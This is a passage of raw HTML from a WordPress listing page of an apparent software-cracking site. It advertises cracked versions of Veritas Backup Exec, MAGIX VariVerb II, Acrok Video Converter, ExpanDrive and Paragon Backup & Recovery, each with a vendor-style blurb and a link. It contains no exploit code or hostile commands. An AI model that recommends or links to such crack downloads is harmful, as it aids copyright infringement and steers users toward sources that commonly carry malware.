src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(3191, 2, '2 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3191_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(3191, 3, '3 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3191_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(3191, 4, '4 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3191_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(3191, 5, '5 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (No Ratings Yet)<br /><span class="post-ratings-text" id="ratings_3191_text"></span></div><div id="post-ratings-3191-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/veritas-backup-exec-crack/">Veritas Backup Exec 20.4.1188.2217 with Crack</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> It&#8217;s not just backup. It&#8217;s a more powerful, flexible, trusted business. Data protection that goes beyond backup and recovery. Veritas Backup Exec helps you migrate to cloud, gives you immediate protection for Windows Server 2016 and Hyper-V 2016, and enables time, cost and resource savin... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/veritas-backup-exec-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-12T11:05:12+00:00">May 12, 2019</time><time class="updated" datetime="2019-05-12T11:05:04+00:00">May 12, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-7" href="https://kcrack.com/category/backup-recovery-tools/" title="View all posts in Backup &amp; Recovery Tools" rel="category tag">Backup &amp; Recovery Tools</a> <a class="tag-10" href="https://kcrack.com/category/featured-software/" title="View all posts in Featured Software" rel="category tag">Featured Software</a> <a class="tag-4" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-9"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/veritas-backup-exec-crack/">Veritas Backup Exec 20.4.1188.2217 with Crack</a> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-12 mb-20 pr-0 pl-0"> <div class="post-desc-row mt-10 row ml-0 mr-0"> It&#8217;s not just backup. It&#8217;s a more powerful, flexible, trusted business. Data protection that goes beyond backup and recovery. Veritas Backup Exec he... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/veritas-backup-exec-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-12T11:05:12+00:00">May 12, 2019</time><time class="updated" datetime="2019-05-12T11:05:04+00:00">May 12, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-2" href="https://kcrack.com/category/backup-recovery-tools/" title="View all posts in Backup &amp; Recovery Tools" rel="category tag">Backup &amp; Recovery Tools</a> <a class="tag-7" href="https://kcrack.com/category/featured-software/" title="View all posts in Featured Software" rel="category tag">Featured Software</a> <a class="tag-7" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> </div> <div class="post-row row ml-0 mr-0"> <div class="post-thumb pl-0 col-lg-2 col-md-2 col-sm-3 col-xs-3"> <a href="https://kcrack.com/magix-variverb-ii-crack/"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="MAGIX VariVerb Crack" data-attachment-id="3188" data-permalink="https://kcrack.com/magix-variverb-ii-crack/magix-variverb-crack/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?fit=254%2C337&amp;ssl=1" data-orig-size="254,337" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="MAGIX VariVerb Crack" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?fit=226%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/MAGIX-VariVerb-Crack-e1557656492111.png?fit=254%2C337&amp;ssl=1" /> </a> </div> <div align="right"><div id="post-ratings-3184" class="post-ratings" data-nonce="bbfa8a2546"><img id="rating_3184_1" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(3184, 1, '1 Star');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3184_2" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(3184, 2, '2 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3184_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(3184, 3, '3 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3184_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(3184, 4, '4 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3184_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(3184, 5, '5 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (No Ratings Yet)<br /><span class="post-ratings-text" id="ratings_3184_text"></span></div><div id="post-ratings-3184-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/magix-variverb-ii-crack/">MAGIX VariVerb II 2.6.0 With Crack</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> VariVerb II Crack is an internal VST / AU effects device. This reverb unit creates classic and modern artificial reverb effects such as room, plate, spring, and nonlinear reverb based on algorithmic calculation, i.e. without using impulse responses. MAGIX VariVerb Full CrackThe benefit of an algorit... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/magix-variverb-ii-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-12T10:32:46+00:00">May 12, 2019</time><time class="updated" datetime="2019-05-12T10:32:30+00:00">May 12, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-12" href="https://kcrack.com/category/graphic-apps/" title="View all posts in Graphic Apps" rel="category tag">Graphic Apps</a> <a class="tag-3" href="https://kcrack.com/category/multimedia/" title="View all posts in Multimedia" rel="category tag">Multimedia</a> <a class="tag-7" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-9"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/magix-variverb-ii-crack/">MAGIX VariVerb II 2.6.0 With Crack</a> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-12 mb-20 pr-0 pl-0"> <div class="post-desc-row mt-10 row ml-0 mr-0"> VariVerb II Crack is an internal VST / AU effects device. This reverb unit creates classic and modern artificial reverb effects such as room, plate, spring, and... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/magix-variverb-ii-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-12T10:32:46+00:00">May 12, 2019</time><time class="updated" datetime="2019-05-12T10:32:30+00:00">May 12, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-8" href="https://kcrack.com/category/graphic-apps/" title="View all posts in Graphic Apps" rel="category tag">Graphic Apps</a> <a class="tag-6" href="https://kcrack.com/category/multimedia/" title="View all posts in Multimedia" rel="category tag">Multimedia</a> <a class="tag-3" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> </div> <div class="post-row row ml-0 mr-0"> <div class="post-thumb pl-0 col-lg-2 col-md-2 col-sm-3 col-xs-3"> <a href="https://kcrack.com/acrok-video-converter-ultimate-crack/"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Acrok Video Converter Ultimate Crack" srcset="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w, https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?zoom=3&amp;resize=150%2C150&amp;ssl=1 450w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="2964" data-permalink="https://kcrack.com/acrok-video-converter-ultimate-crack/acrok-video-converter-ultimate-crack/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?fit=480%2C360&amp;ssl=1" data-orig-size="480,360" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Acrok Video Converter Ultimate Crack" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?fit=300%2C225&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Acrok-Video-Converter-Ultimate-Crack.jpg?fit=480%2C360&amp;ssl=1" /> </a> </div> <div align="right"><div id="post-ratings-2962" class="post-ratings" data-nonce="638865d11c"><img id="rating_2962_1" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(2962, 1, '1 Star');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_2962_2" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(2962, 2, '2 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_2962_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(2962, 3, '3 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_2962_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(2962, 4, '4 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_2962_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(2962, 5, '5 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (No Ratings Yet)<br /><span class="post-ratings-text" id="ratings_2962_text"></span></div><div id="post-ratings-2962-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/acrok-video-converter-ultimate-crack/">Acrok Video Converter Ultimate 6.6.101.1240With crack</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> This all-in-one Blu-ray/DVD/HD Converter provides lots of useful functions. You can choose the language or subtitle from the movies, and output video with 5.1 Dolby surround sound. Besides, you can trim, crop, add watermark, add subtitle, convert 2D to 3D, or adjust effect to the video, you can also... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/acrok-video-converter-ultimate-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-12T09:53:50+00:00">May 12, 2019</time><time class="updated" datetime="2019-05-12T09:53:47+00:00">May 12, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-10" href="https://kcrack.com/category/converters/audio-converters/" title="View all posts in Audio Converters" rel="category tag">Audio Converters</a> <a class="tag-9" href="https://kcrack.com/category/converters/" title="View all posts in Converters" rel="category tag">Converters</a> <a class="tag-9" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a> <a class="tag-8" href="https://kcrack.com/category/converters/video-converters/" title="View all posts in Video Converters" rel="category tag">Video Converters</a></span> </div> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-9"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/acrok-video-converter-ultimate-crack/">Acrok Video Converter Ultimate 6.6.101.1240With crack</a> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-12 mb-20 pr-0 pl-0"> <div class="post-desc-row mt-10 row ml-0 mr-0"> This all-in-one Blu-ray/DVD/HD Converter provides lots of useful functions. You can choose the language or subtitle from the movies, and output video with 5.1 D... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/acrok-video-converter-ultimate-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-12T09:53:50+00:00">May 12, 2019</time><time class="updated" datetime="2019-05-12T09:53:47+00:00">May 12, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-12" href="https://kcrack.com/category/converters/audio-converters/" title="View all posts in Audio Converters" rel="category tag">Audio Converters</a> <a class="tag-12" href="https://kcrack.com/category/converters/" title="View all posts in Converters" rel="category tag">Converters</a> <a class="tag-11" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a> <a class="tag-2" href="https://kcrack.com/category/converters/video-converters/" title="View all posts in Video Converters" rel="category tag">Video Converters</a></span> </div> </div> </div> </div> <div class="post-row row ml-0 mr-0"> <div class="post-thumb pl-0 col-lg-2 col-md-2 col-sm-3 col-xs-3"> <a href="https://kcrack.com/expandrive-crack/"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/ExpanDrive-Crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="ExpanDrive Crack" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/ExpanDrive-Crack.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/ExpanDrive-Crack.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="3180" data-permalink="https://kcrack.com/expandrive-crack/expandrive-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/ExpanDrive-Crack.png?fit=300%2C187&amp;ssl=1" data-orig-size="300,187" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="ExpanDrive Crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/ExpanDrive-Crack.png?fit=300%2C187&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/05/ExpanDrive-Crack.png?fit=300%2C187&amp;ssl=1" /> </a> </div> <div align="right"><div id="post-ratings-3178" class="post-ratings" data-nonce="91aef2963c"><img id="rating_3178_1" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(3178, 1, '1 Star');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3178_2" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(3178, 2, '2 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3178_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(3178, 3, '3 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3178_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(3178, 4, '4 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3178_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(3178, 5, '5 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (No Ratings Yet)<br /><span class="post-ratings-text" id="ratings_3178_text"></span></div><div id="post-ratings-3178-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/expandrive-crack/">ExpanDrive 7.0.16 With Crack</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> ExpanDrive  Crack The Best Gets Even Better &#8211; Say Hello to ExpanDrive 7. ExpanDrive is a fast network drive and browser for cloud storage. Securely access the cloud from any application, including Finder and Explorer. Amazon Cloud Drive, Box, SFTP, WebDAV, S3 and many more. It acts just like ... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/expandrive-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-11T18:07:24+00:00">May 11, 2019</time><time class="updated" datetime="2019-05-11T18:07:07+00:00">May 11, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-12" href="https://kcrack.com/category/ios-tools/" title="View all posts in iOS Tools" rel="category tag">iOS Tools</a> <a class="tag-12" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-9"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/expandrive-crack/">ExpanDrive 7.0.16 With Crack</a> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-12 mb-20 pr-0 pl-0"> <div class="post-desc-row mt-10 row ml-0 mr-0"> ExpanDrive  Crack The Best Gets Even Better &#8211; Say Hello to ExpanDrive 7. ExpanDrive is a fast network drive and browser for cloud storage. Securely acces... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/expandrive-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-11T18:07:24+00:00">May 11, 2019</time><time class="updated" datetime="2019-05-11T18:07:07+00:00">May 11, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-10" href="https://kcrack.com/category/ios-tools/" title="View all posts in iOS Tools" rel="category tag">iOS Tools</a> <a class="tag-1" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> </div> <div class="post-row row ml-0 mr-0"> <div class="post-thumb pl-0 col-lg-2 col-md-2 col-sm-3 col-xs-3"> <a href="https://kcrack.com/paragon-backup-recovery-pro-crack/"> <img width="150" height="150" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Paragon-Backup-Recovery-PRO-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Paragon Backup &amp; Recovery PRO Crack" srcset="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Paragon-Backup-Recovery-PRO-Crack.jpg?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Paragon-Backup-Recovery-PRO-Crack.jpg?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="3174" data-permalink="https://kcrack.com/paragon-backup-recovery-pro-crack/paragon-backup-recovery-pro-crack/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Paragon-Backup-Recovery-PRO-Crack.jpg?fit=302%2C450&amp;ssl=1" data-orig-size="302,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Paragon Backup &#038; Recovery PRO Crack" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Paragon-Backup-Recovery-PRO-Crack.jpg?fit=201%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2019/05/Paragon-Backup-Recovery-PRO-Crack.jpg?fit=302%2C450&amp;ssl=1" /> </a> </div> <div align="right"><div id="post-ratings-3173" class="post-ratings" data-nonce="c4a29378c7"><img id="rating_3173_1" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(3173, 1, '1 Star');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3173_2" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(3173, 2, '2 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3173_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(3173, 3, '3 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3173_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(3173, 4, '4 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3173_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(3173, 5, '5 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (No Ratings Yet)<br /><span class="post-ratings-text" id="ratings_3173_text"></span></div><div id="post-ratings-3173-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/paragon-backup-recovery-pro-crack/">Paragon Backup &#038; Recovery PRO 17.4.3 With Crack</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> Paragon Backup &amp; Recovery PRO Crack is an advanced backup and restore software for individual users. You don’t need deep IT skills or computing knowledge to protect files and folders, partitions, disks or even the entire system. Paragon Backup &amp; Recovery makes PC protection a child’s pla... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/paragon-backup-recovery-pro-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-11T17:43:34+00:00">May 11, 2019</time><time class="updated" datetime="2019-05-11T17:43:53+00:00">May 11, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-1" href="https://kcrack.com/category/backup-recovery-tools/" title="View all posts in Backup &amp; Recovery Tools" rel="category tag">Backup &amp; Recovery Tools</a> <a class="tag-11" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-9"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/paragon-backup-recovery-pro-crack/">Paragon Backup &#038; Recovery PRO 17.4.3 With Crack</a> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-12 mb-20 pr-0 pl-0"> <div class="post-desc-row mt-10 row ml-0 mr-0"> Paragon Backup &amp; Recovery PRO Crack is an advanced backup and restore software for individual users. You don’t need deep IT skills or computing knowledge ... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/paragon-backup-recovery-pro-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-11T17:43:34+00:00">May 11, 2019</time><time class="updated" datetime="2019-05-11T17:43:53+00:00">May 11, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-3" href="https://kcrack.com/category/backup-recovery-tools/" title="View all posts in Backup &amp; Recovery Tools" rel="category tag">Backup &amp; Recovery Tools</a> <a class="tag-8" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC Software</a></span> </div> </div> </div> </div> <nav class="pagination"><ul class='page-numbers'> <li><span aria-current='page' class='page-numbers current'>1</span></li> <li><a class='page-numbers' 